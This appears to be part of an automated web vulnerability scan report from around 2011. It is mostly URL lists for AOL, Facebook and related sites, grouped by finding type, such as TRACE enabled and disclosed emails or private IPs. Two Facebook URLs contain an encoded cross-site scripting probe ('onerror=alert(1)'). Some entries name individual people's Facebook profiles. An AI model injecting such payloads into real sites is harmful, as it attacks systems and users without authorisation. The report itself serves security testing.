23.377. http://www.aol.com/ajax.jsp

23.378. http://www.aol.com/ajax.jsp

23.379. http://www.aol.com/ajax.jsp

23.380. http://www.aol.com/ajax.jsp

23.381. http://www.aol.com/ajax.jsp

23.382. http://www.aol.com/ajax.jsp

23.383. http://www.apple.com/itunes/affiliates/download/

23.384. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js

23.385. http://www.blogsmithmedia.com/www.dailyfinance.com/include/dailyfinance.js

23.386. http://www.citysbest.com/

23.387. http://www.dailyfinance.com/

23.388. http://www.facebook.com/BPAmerica

23.389. http://www.facebook.com/ajax/intl/language_dialog.php

23.390. http://www.facebook.com/careers/

23.391. http://www.facebook.com/find-friends

23.392. http://www.facebook.com/find-friends

23.393. http://www.facebook.com/help/

23.394. http://www.facebook.com/help/

23.395. http://www.facebook.com/help/

23.396. http://www.facebook.com/login.php

23.397. http://www.facebook.com/mobile/

23.398. http://www.facebook.com/mobile/

23.399. http://www.facebook.com/pages/create.php

23.400. http://www.facebook.com/plugins/activity.php

23.401. http://www.facebook.com/plugins/activity.php

23.402. http://www.facebook.com/plugins/activity.php

23.403. http://www.facebook.com/plugins/activity.php

23.404. http://www.facebook.com/plugins/comments.php

23.405. http://www.facebook.com/plugins/comments.php

23.406. http://www.facebook.com/plugins/comments.php

23.407. http://www.facebook.com/plugins/facepile.php

23.408. http://www.facebook.com/plugins/like.php

23.409. http://www.facebook.com/plugins/like.php

23.410. http://www.facebook.com/plugins/likebox.php

23.411. http://www.facebook.com/plugins/likebox.php

23.412. http://www.facebook.com/plugins/likebox.php

23.413. http://www.facebook.com/plugins/likebox.php

23.414. http://www.facebook.com/plugins/likebox.php

23.415. http://www.facebook.com/plugins/likebox.php

23.416. http://www.facebook.com/plugins/likebox.php

23.417. http://www.facebook.com/plugins/likebox.php

23.418. http://www.facebook.com/plugins/likebox.php

23.419. http://www.facebook.com/plugins/likebox.php

23.420. http://www.facebook.com/plugins/likebox.php

23.421. http://www.facebook.com/plugins/likebox.php

23.422. http://www.facebook.com/plugins/likebox.php

23.423. http://www.facebook.com/plugins/likebox.php

23.424. http://www.facebook.com/plugins/likebox.php

23.425. http://www.facebook.com/plugins/likebox.php

23.426. http://www.facebook.com/plugins/recommendations.php

23.427. http://www.facebook.com/plugins/recommendations.php

23.428. http://www.facebook.com/plugins/recommendations.php

23.429. http://www.facebook.com/plugins/send.php

23.430. http://www.facebook.com/plugins/send.php

23.431. http://www.facebook.com/r.php

23.432. http://www.facebook.com/r.php

23.433. http://www.facebook.com/share.php

23.434. http://www.facebook.com/sharer.php

23.435. http://www.facebook.com/terms.php

23.436. http://www.facebook.com/terms.php

23.437. http://www.flickr.com/badge_code_v2.gne

23.438. http://www.games.com/game/family-feud/

23.439. http://www.google.com/search

23.440. http://www.google.com/search

23.441. http://www.google.com/url

23.442. http://www.google.com/url

23.443. http://www.google.com/webhp

23.444. http://www.huffingtonpost.com/

23.445. http://www.huffingtonpost.com/

23.446. http://www.huffingtonpost.com/

23.447. http://www.huffingtonpost.com/blogs_front.html

23.448. http://www.huffingtonpost.com/news_col_1.html

23.449. http://www.huffingtonpost.com/news_col_2.html

23.450. http://www.huffingtonpost.com/permalink-tracker.html

23.451. http://www.huffingtonpost.com/threeup.php

23.452. http://www.mapquest.com/

23.453. http://www.mapquest.com/

23.454. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

23.455. http://yellowpages.aol.com/

24. Cross-domain script include

24.1. http://abcnews.go.com/Entertainment/popup

24.2. https://account.login.aol.com/_cqr/opr/opr.psp

24.3. http://addons.aol.com/welcome/index.html

24.4. http://ads.undertone.com/afr.php

24.5. http://aol.sportingnews.com/

24.6. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php

24.7. http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter

24.8. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php

24.9. http://aol.sportingnews.com/services/sn-promos/snt_promo_spot.php

24.10. http://aol.sportingnews.com/services/sn-promos/yearbooks.php

24.11. http://aolproductcentral.aol.com/ClickBroker

24.12. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-computer-checkup/

24.13. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-quick-check-live/

24.14. https://aolproductcentral.aol.com/ClickBroker

24.15. http://apartments.rentedspaces.oodle.com/

24.16. http://api.screenname.aol.com/auth/login

24.17. https://api.screenname.aol.com/auth/login

24.18. http://apps.conduit.com/

24.19. http://apps.conduit.com/TechCrunch_App-Techcrunch_News

24.20. http://ar-ar.facebook.com/login.php

24.21. http://ax.itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast

24.22. http://blog.mapquest.com/

24.23. http://browser.cdn.aol.com/customie8/aol/download.html

24.24. http://browsers.aol.com/customfirefox/aol/download.html

24.25. http://browsers.aol.com/customie/aol/download.html

24.26. http://d.tradex.openx.com/afr.php

24.27. http://daol.aol.com/software/

24.28. http://daol.aol.com/software/computer-checkup-premium/

24.29. http://daol.aol.com/software/livemocha

24.30. http://dev.aol.com/

24.31. http://developers.facebook.com/

24.32. http://digg.com/submit

24.33. http://ecommerce.randomhouse.com/

24.34. http://fantasysource.sportingnews.com/baseball/free

24.35. http://fantasysource.sportingnews.com/baseball/promo

24.36. http://fantasysource.sportingnews.com/baseball/rankings

24.37. http://features.mapquest.com/toolbar/

24.38. http://feedback.aol.com/help/newaolcom/

24.39. http://gasprices.mapquest.com/

24.40. http://groups.google.com/grphp

24.41. http://help.aol.com/help/microsites/article_index.jsp

24.42. http://help.aol.com/help/microsites/microsite.do

24.43. http://help.aol.com/help/microsites/search.do

24.44. http://help.aol.com/help/teams/help_team/

24.45. http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewEula

24.46. http://itunes.apple.com/app/sporting-news-pro-football/id300213367

24.47. http://itunes.apple.com/us/app/aim-free-edition/id281704574

24.48. http://itunes.apple.com/us/app/engadget/id347839246

24.49. http://itunes.apple.com/us/app/merchantcircle/id434786474

24.50. http://itunes.apple.com/us/artist/aol-inc/id281704577

24.51. http://itunes.apple.com/us/genre/ios-news/id6009

24.52. http://lifestream.aol.com/

24.53. http://lifestream.aol.com/

24.54. http://lifestream.aol.com/facebook/login

24.55. http://lifestream.aol.com/search

24.56. http://mobile.aol.com/

24.57. http://mobile.aol.com/product/Android/dailyfinance/

24.58. http://mobile.aol.com/product/iPhone/Autos/

24.59. http://mobile.aol.com/product/iPhone/aim/

24.60. http://mobile.aol.com/product/iPhone/aol-radio/

24.61. http://mobile.aol.com/product/iPhone/daily-finance/

24.62. http://mobile.aol.com/product/iPhone/engadget/

24.63. http://mobile.aol.com/product/iPhone/iPad/

24.64. http://mobile.aol.com/product/iPhone/mail/

24.65. http://mobile.aol.com/product/iPhone/search/

24.66. http://music.aol.com/radioguide/bb

24.67. http://my.screenname.aol.com/_cqr/logout/mcLogout.psp

24.68. https://my.screenname.aol.com/_cqr/login/login.psp

24.69. https://my.screenname.aol.com/_cqr/login/login.psp

24.70. https://my.screenname.aol.com/_cqr/login/login.psp

24.71. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp

24.72. https://my.screenname.aol.com/badbrowser.psp

24.73. https://new.aol.com/productsweb

24.74. https://new.aol.com/productsweb/

24.75. http://newsfeed.time.com/2011/05/04/do-chicks-and-fans-really-dig-the-long-ball-why-no-hitters-arent-drawing-crowds/

24.76. http://newsfeed.time.com/2011/05/04/osama-memes-are-unsurprisingly-everywhere-how-much-is-too-much/

24.77. http://newsfeed.time.com/2011/05/04/too-tight-dress-gets-beyonce-booed-at-met-galas-red-carpet/

24.78. http://o.aolcdn.com/os/df/js/copyRight.js

24.79. http://o.aolcdn.com/truveocom/client/versions/univ_ent/css/fonts/calibri-bold-italic/Calibrz.eot

24.80. http://player.radio.com/player/AOLPlayer.php

24.81. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

24.82. http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=29138469/xsxdata=1:93241795/hr=12/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FAndroid%252Fdailyfinance%252F

24.83. http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=55333782/xsxdata=1:93241795/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FiPhone%252Fengadget%252F

24.84. http://r1-ads.ace.advertising.com/site=743226/size=728090/u=2/bnum=63245784/xsxdata=1:93232707/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmusic.aol.com%252Fradioguide%252Fbb

24.85. http://r1-ads.ace.advertising.com/site=743227/size=300250/u=2/bnum=97154103/xsxdata=1:93310501/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Frealestate.aol.com%252F%253Ficid%253Dnavbar_realest_main5

24.86. http://r1-ads.ace.advertising.com/site=800563/size=300250/u=2/bnum=84248618/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F%253Ficid%253Dnavbar_huffpo_main5

24.87. http://r1-ads.ace.advertising.com/site=804145/size=300250/u=2/bnum=31568465/xsxdata=1:93313567/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

24.88. http://r1-ads.ace.advertising.com/site=804145/size=728090/u=2/bnum=24626462/xsxdata=1:93312584/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

24.89. http://realestate.aol.com/

24.90. http://realestate.aol.com/blog/rental-listings

24.91. http://realestate.aol.com/modules/common2/main_mortrate_data.jsp

24.92. http://realestate.aol.com/modules/common2/main_mortrate_data.jsp

24.93. http://s3.cinesport.com/app_v2/csprt_player.js

24.94. http://s3.cinesport.com/players/sportingnewsnfl.html

24.95. http://search.aol.com/aol/settings

24.96. http://shortcuts.com/

24.97. http://sportsillustrated.cnn.com/2011/mma/boxing/05/04/alvarez.rhodes.ap/index.html

24.98. http://sportsillustrated.cnn.com/2011/mma/boxing/05/04/pacquiao.mosley.ap/index.html

24.99. http://sportsillustrated.cnn.com/2011/writers/bryan_armen_graham/05/03/manny.pacquiao.shane.mosley.preview/index.html

24.100. http://sportsillustrated.cnn.com/2011/writers/jeff_wagenheim/05/03/may.rankings/index.html

24.101. http://techcrunch.com/

24.102. http://techcrunch.com/

24.103. http://techcrunch.com/

24.104. http://techcrunch.com/

24.105. http://techcrunch.com/

24.106. http://techcrunch.com/

24.107. http://techcrunch.com/page/2/

24.108. http://television.aol.com/

24.109. http://twitter.com/search

24.110. https://twitter.com/signup

24.111. https://us.etrade.com/e/t/welcome/whychooseetrade

24.112. http://video.foxbusiness.com/v/4677646/job-market-weighing-on-economic-recovery/

24.113. http://video.foxbusiness.com/v/4677647/white-house-announces-it-wont-release-bin-laden-pictures/

24.114. http://video.foxbusiness.com/v/4677755/the-need-to-boost-oil-drilling-in-us/

24.115. http://weather.aol.com/

24.116. http://wireless.mapquest.com/

24.117. http://www.aim.com/products/express/

24.118. http://www.aol.com/

24.119. http://www.bankrate.com/funnel/mortgages/

24.120. http://www.blogsmithmedia.com/www.dailyfinance.com/media/dailyfinance.css

24.121. http://www.citysbest.com/

24.122. http://www.cloudscan.me/

24.123. http://www.cloudscan.me/search

24.124. http://www.crunchboard.com/opening/detailjob.php

24.125. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

24.126. http://www.dailyfinance.com/

24.127. http://www.dailyfinance.com/markets/mostactives

24.128. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

24.129. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

24.130. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

24.131. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

24.132. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

24.133. http://www.exploit-db.com/exploits/16962/

24.134. http://www.facebook.com/

24.135. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

24.136. http://www.facebook.com/10000082482078341583

24.137. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

24.138. http://www.facebook.com/1242845259

24.139. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

24.140. http://www.facebook.com/2008/fbml

24.141. http://www.facebook.com/AOLrealestate

24.142. http://www.facebook.com/BPAmerica

24.143. http://www.facebook.com/DailyFinance

24.144. http://www.facebook.com/HockeyKen

24.145. http://www.facebook.com/KickIceForever

24.146. http://www.facebook.com/LadyBonesie

24.147. http://www.facebook.com/Loizza

24.148. http://www.facebook.com/aim

24.149. http://www.facebook.com/ajax/intl/language_dialog.php

24.150. http://www.facebook.com/aol

24.151. http://www.facebook.com/aolradio

24.152. http://www.facebook.com/burkerkink

24.153. http://www.facebook.com/careers/

24.154. http://www.facebook.com/deedee.perez1

24.155. http://www.facebook.com/directory/pages/

24.156. http://www.facebook.com/directory/people/

24.157. http://www.facebook.com/facebook

24.158. http://www.facebook.com/fayse

24.159. http://www.facebook.com/find-friends

24.160. http://www.facebook.com/find-friends

24.161. http://www.facebook.com/gale.l.schenk

24.162. http://www.facebook.com/help/

24.163. http://www.facebook.com/help/

24.164. http://www.facebook.com/izaOllie

24.165. http://www.facebook.com/jezzas

24.166. http://www.facebook.com/kimberly.christ

24.167. http://www.facebook.com/ladonna.lokey

24.168. http://www.facebook.com/lakendra.roberts

24.169. http://www.facebook.com/login.php

24.170. http://www.facebook.com/matthew.oliveira2

24.171. http://www.facebook.com/mmafighting

24.172. http://www.facebook.com/mobile/

24.173. http://www.facebook.com/pages/Barnesville/115038011847083

24.174. http://www.facebook.com/pages/Beacon-of-Hope-Resource-Center/34194116820

24.175. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478

24.176. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059

24.177. http://www.facebook.com/pages/Editor-in-Chief/137829579583400

24.178. http://www.facebook.com/pages/Gilco-Corporation/109823499042436

24.179. http://www.facebook.com/pages/HMFIC/149403761740008

24.180. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312

24.181. http://www.facebook.com/pages/Merchandiser/123981654314779

24.182. http://www.facebook.com/pages/New-Haven-College/130105783687523

24.183. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674

24.184. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680

24.185. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707

24.186. http://www.facebook.com/pages/Sporting-News/104068362964496

24.187. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520

24.188. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161

24.189. http://www.facebook.com/pages/create.php

24.190. http://www.facebook.com/pages/memorial-high-school-west-new-york-nj/114508558584580

24.191. http://www.facebook.com/patroyo

24.192. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

24.193. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259

24.194. http://www.facebook.com/people/Bucky-Jordan/100000824820783

24.195. http://www.facebook.com/plugins/activity.php

24.196. http://www.facebook.com/plugins/activity.php

24.197. http://www.facebook.com/plugins/comments.php

24.198. http://www.facebook.com/plugins/comments.php

24.199. http://www.facebook.com/plugins/facepile.php

24.200. http://www.facebook.com/plugins/facepile.php

24.201. http://www.facebook.com/plugins/like.php

24.202. http://www.facebook.com/plugins/likebox.php

24.203. http://www.facebook.com/plugins/likebox.php

24.204. http://www.facebook.com/plugins/recommendations.php

24.205. http://www.facebook.com/plugins/recommendations.php

24.206. http://www.facebook.com/plugins/send.php

24.207. http://www.facebook.com/plugins/send.php

24.208. http://www.facebook.com/policy.php

24.209. http://www.facebook.com/privacy/explanation.php

24.210. http://www.facebook.com/r.php

24.211. http://www.facebook.com/r.php

24.212. http://www.facebook.com/robynalys

24.213. http://www.facebook.com/share.php

24.214. http://www.facebook.com/sharer.php

24.215. http://www.facebook.com/skdarealist

24.216. http://www.facebook.com/sportingnews

24.217. http://www.facebook.com/stefanoboscolomarchi

24.218. http://www.facebook.com/techcrunch

24.219. http://www.facebook.com/terms.php

24.220. http://www.facebook.com/terms.php

24.221. http://www.facebook.com/theteebers

24.222. http://www.facebook.com/wmoppert

24.223. https://www.fightmagazine.com/mma-magazine/subscribe.asp

24.224. http://www.games.com/browse-games/all/

24.225. http://www.games.com/game-play/family-feud/single

24.226. http://www.games.com/game/family-feud/

24.227. https://www.godaddy.com/

24.228. https://www.godaddy.com/domains/search.aspx

24.229. https://www.godaddy.com/gdshop/hosting/landing.asp

24.230. http://www.huffingtonpost.com/

24.231. http://www.huffingtonpost.com/2011/05/02/

24.232. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html

24.233. http://www.huffingtonpost.com/2011/05/04/

24.234. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html

24.235. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html

24.236. http://www.huffingtonpost.com/advertise/

24.237. http://www.huffingtonpost.com/imam-feisal-abdul-rauf/bin-laden-terrorism_b_857345.html

24.238. http://www.huffingtonpost.com/newsinc/landing_page.html

24.239. http://www.huffingtonpost.com/permalink-tracker.html

24.240. http://www.huffingtonpost.com/rep-carolyn-maloney/the-cfpb-needs-to-get-to_b_857393.html

24.241. http://www.huffingtonpost.com/users/logout/

24.242. http://www.lakewoodbeacon.org/

24.243. http://www.mapquest.com/

24.244. http://www.mapquest.com/directions

24.245. http://www.mapquest.com/maps

24.246. http://www.mapquest.com/routeplanner

24.247. http://www.marketwatch.com/News/Story/Story.aspx

24.248. http://www.metricstream.com/

24.249. http://www.mmafighting.com/

24.250. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

24.251. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

24.252. http://www.mmawarehouse.com/

24.253. http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm

24.254. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm

24.255. http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm

24.256. http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm

24.257. http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm

24.258. http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm

24.259. http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm

24.260. http://www.moviefone.com/

24.261. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

24.262. http://www.popeater.com/

24.263. http://www.smartertools.com/

24.264. http://www.smartertools.com/smartermail/mail-server-download.aspx

24.265. http://www.smartertools.com/smartermail/mail-server-software.aspx

24.266. http://www.smartertools.com/smarterstats/web-analytics-seo-software-download.aspx

24.267. http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx

24.268. http://www.smartertools.com/smartertrack/help-desk-software.aspx

24.269. http://www.truveo.com/

24.270. http://www.truveo.com/client/versions/univ_ent/js/truveo.libs.util.v1304543460.js

24.271. http://www.truveo.com/search

24.272. http://www.tuaw.com/hub/app-reviews

24.273. http://xss.cx/

24.274. http://yellowpages.aol.com/

25. File upload functionality

26. TRACE method is enabled

26.1. http://a0.twimg.com/

26.2. http://alerts.aol.com/

26.3. http://anrtx.tacoda.net/

26.4. http://api.adcopy.com/

26.5. http://api.screenname.aol.com/

26.6. https://api.screenname.aol.com/

26.7. http://b.aol.com/

26.8. http://b.dailyfinance.com/

26.9. http://b.games.com/

26.10. http://b.huffingtonpost.com/

26.11. http://b.mmafighting.com/

26.12. http://b.tuaw.com/

26.13. http://blog.mapquest.com/

26.14. http://cheetah.vizu.com/

26.15. http://coverage.mqcdn.com/

26.16. http://d.tradex.openx.com/

26.17. http://d.xp1.ru4.com/

26.18. http://d1.openx.org/

26.19. http://digg.com/

26.20. http://entry-stats.huffpost.com/

26.21. http://features.mapquest.com/

26.22. http://image3.pubmatic.com/

26.23. http://legal.aol.com/

26.24. http://metrics.apple.com/

26.25. http://mobile.aol.com/

26.26. http://money.cnn.com/

26.27. http://music.aol.com/

26.28. http://o.sa.aol.com/

26.29. http://picasaweb.google.com/

26.30. http://portal.pf.aol.com/

26.31. http://portalblog.aol.com/

26.32. http://privacy.aol.com/

26.33. http://ptrack.pubmatic.com/

26.34. http://puma.vizu.com/

26.35. http://secure-us.imrworldwide.com/

26.36. http://services.crunchboard.com/

26.37. http://sportingnews.122.2o7.net/

26.38. http://surveys.aol.com/

26.39. http://t.mookie1.com/

26.40. http://tacoda.at.atwola.com/

26.41. http://vertical-stats.huffpost.com/

26.42. http://video.aol.com/

26.43. http://widgets.digg.com/

26.44. http://wireless.mapquest.com/

26.45. http://www.aim.com/

26.46. http://www.aolnews.com/

26.47. http://www.citysbest.com/

26.48. http://www.crunchboard.com/

26.49. http://www.dailyfinance.com/

26.50. http://www.dooce.com/

26.51. http://www.mmafighting.com/

26.52. http://www.moviefone.com/

26.53. http://www.popeater.com/

26.54. http://www.truveo.com/

26.55. http://www.tuaw.com/

26.56. http://xml.truveo.com/

27. Email addresses disclosed

27.1. http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter

27.2. http://aolmobile.aolcdn.com/js/s2c.js

27.3. http://blog.mapquest.com/

27.4. http://dev.aol.com/

27.5. http://fantasysource.sportingnews.com/baseball/free

27.6. http://fantasysource.sportingnews.com/baseball/promo

27.7. http://fantasysource.sportingnews.com/baseball/rankings

27.8. http://images.apple.com/global/scripts/lib/event_mixins.js

27.9. http://images.apple.com/global/scripts/lib/scriptaculous.js

27.10. http://legal.aol.com/copyright-reporting/

27.11. http://mobile.aol.com/product/Android/dailyfinance/

27.12. http://mobile.aol.com/product/iPhone/Autos/

27.13. http://mobile.aol.com/product/iPhone/aim/

27.14. http://mobile.aol.com/product/iPhone/aol-radio/

27.15. http://mobile.aol.com/product/iPhone/daily-finance/

27.16. http://mobile.aol.com/product/iPhone/engadget/

27.17. http://mobile.aol.com/product/iPhone/iPad/

27.18. http://mobile.aol.com/product/iPhone/mail/

27.19. http://mobile.aol.com/product/iPhone/search/

27.20. https://new.aol.com/productsweb

27.21. https://new.aol.com/productsweb/

27.22. https://new.aol.com/productsweb/

27.23. http://o.aolcdn.com/art/webwidgets/sfsw_v1_3/feeds_subscribe_en_us.js

27.24. http://o.aolcdn.com/bill.aol.com/help/help_rev/js/cookies.js

27.25. http://o.aolcdn.com/os/df/js/feeds_subscribe_en_us.js

27.26. http://o.aolcdn.com/os_merge/

27.27. http://portal.aolcdn.com/p5/_v42.5/js/override.60241.main.js

27.28. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

27.29. http://privacy.aol.com/

27.30. http://s.huffpost.com/assets/js.php

27.31. http://shortcuts.com/

27.32. http://st.snimg.com/js/omniture.js

27.33. http://surveys.aol.com/lib/js/main.js.php

27.34. http://top-sec.net/quran/

27.35. http://twitter.com/account/bootstrap_data

27.36. http://webcache.googleusercontent.com/search

27.37. http://www.cloudscan.me/feeds/posts/default

27.38. http://www.dailyfinance.com/markets/mostactives

27.39. http://www.games.com/browse-games/all/

27.40. http://www.games.com/game-play/family-feud/single

27.41. http://www.games.com/game/family-feud/

27.42. https://www.godaddy.com/

27.43. https://www.godaddy.com/domains/search.aspx

27.44. https://www.godaddy.com/gdshop/hosting/landing.asp

27.45. http://www.google.com/s

27.46. http://www.google.com/search

27.47. http://www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html

27.48. http://www.huffingtonpost.com/2011/05/04/cnn-poll-finds-that-most-_n_857597.html

27.49. http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html

27.50. http://www.lakewoodbeacon.org/

27.51. http://www.metricstream.com/company/contactinfo.htm

27.52. http://www.metricstream.com/js/functions_newweb.js

27.53. http://www.metricstream.com/js/functions_web.js

27.54. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

27.55. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

27.56. https://www.neodata.com/pub/snew/new_print.shtml

27.57. http://www.popeater.com/

27.58. http://www.smartertools.com/smartermail/mail-server-download.aspx

27.59. http://www.smartertools.com/smarterstats/web-analytics-seo-software-download.aspx

27.60. http://www.truveo.com/client/versions/univ_ent/js/truveo.module.jquery.jmycarousel.v1304543462.js

28. Private IP addresses disclosed

28.1. http://apps.facebook.com/truveo-search

28.2. http://ar-ar.facebook.com/login.php

28.3. http://ar-ar.facebook.com/login.php

28.4. http://developers.facebook.com/

28.5. http://developers.facebook.com/plugins/

28.6. http://digg.com/submit

28.7. http://external.ak.fbcdn.net/safe_image.php

28.8. http://external.ak.fbcdn.net/safe_image.php

28.9. http://external.ak.fbcdn.net/safe_image.php

28.10. http://external.ak.fbcdn.net/safe_image.php

28.11. http://external.ak.fbcdn.net/safe_image.php

28.12. http://graph.facebook.com/10134017/picture

28.13. http://player.radio.com/player/AOLPlayer.php

28.14. http://static.ak.fbcdn.net/connect.php/js/FB.Share

28.15. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.16. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.17. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.18. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.19. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.20. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.22. http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css

28.23. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css

28.24. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/wRBjYtc4wBS.js

28.25. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/StBpzJi4QhY.js

28.26. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css

28.27. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/yhXvg7ip9xz.js

28.28. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css

28.29. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/9czF9X7LzHI.css

28.30. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/ghnacGC4_R6.js

28.31. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css

28.32. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/AKaGrClUAcV.js

28.33. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/ZqyvC4c4-gR.js

28.34. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/oaBzoE1JD-P.css

28.35. http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/zicApnLO7GQ.css

28.36. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/CYgI95uCQNj.png

28.37. http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/5ZAfR7_4gQg.css

28.38. http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/vLMBFMZDXfh.js

28.39. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/_W1I0sF4Rhh.js

28.40. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css

28.41. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/3GUx1LLG0cl.css

